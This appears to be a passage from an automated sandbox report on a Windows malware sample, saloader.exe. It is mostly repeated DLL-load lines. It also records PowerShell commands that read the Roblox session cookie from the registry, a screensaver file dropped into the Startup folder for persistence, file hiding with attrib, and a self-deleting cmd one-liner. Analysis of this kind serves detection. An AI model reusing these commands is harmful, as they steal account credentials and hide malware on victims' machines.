                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\saloader.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: saloader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: saloader.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: saloader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: saloader.exe | Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC6294D5 push edi; ret 0_2_00007FFAAC6294D6
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC6320A1 push esi; retf 0_2_00007FFAAC6320A7
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E4C62 push ebx; retf 0_2_00007FFAAC7E59DA
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7D7963 push ebx; retf 0_2_00007FFAAC7D796A
                        Source: C:\Users\user\Desktop\saloader.exe | Code function: 0_2_00007FFAAC7E58E8 push ebx; retf 0_2_00007FFAAC7E59DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAC50D2A5 pushad ; iretd 9_2_00007FFAAC50D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAC6285FA push ebx; ret 9_2_00007FFAAC62868A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAC62868D push ebx; ret 9_2_00007FFAAC6286EA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC6300BD pushad ; iretd 14_2_00007FFAAC6300C1

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"

                        Boot Survival

                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr
                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
                        Source: C:\Users\user\Desktop\saloader.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr\:Zone.Identifier:$DATA

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Users\user\Desktop\saloader.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
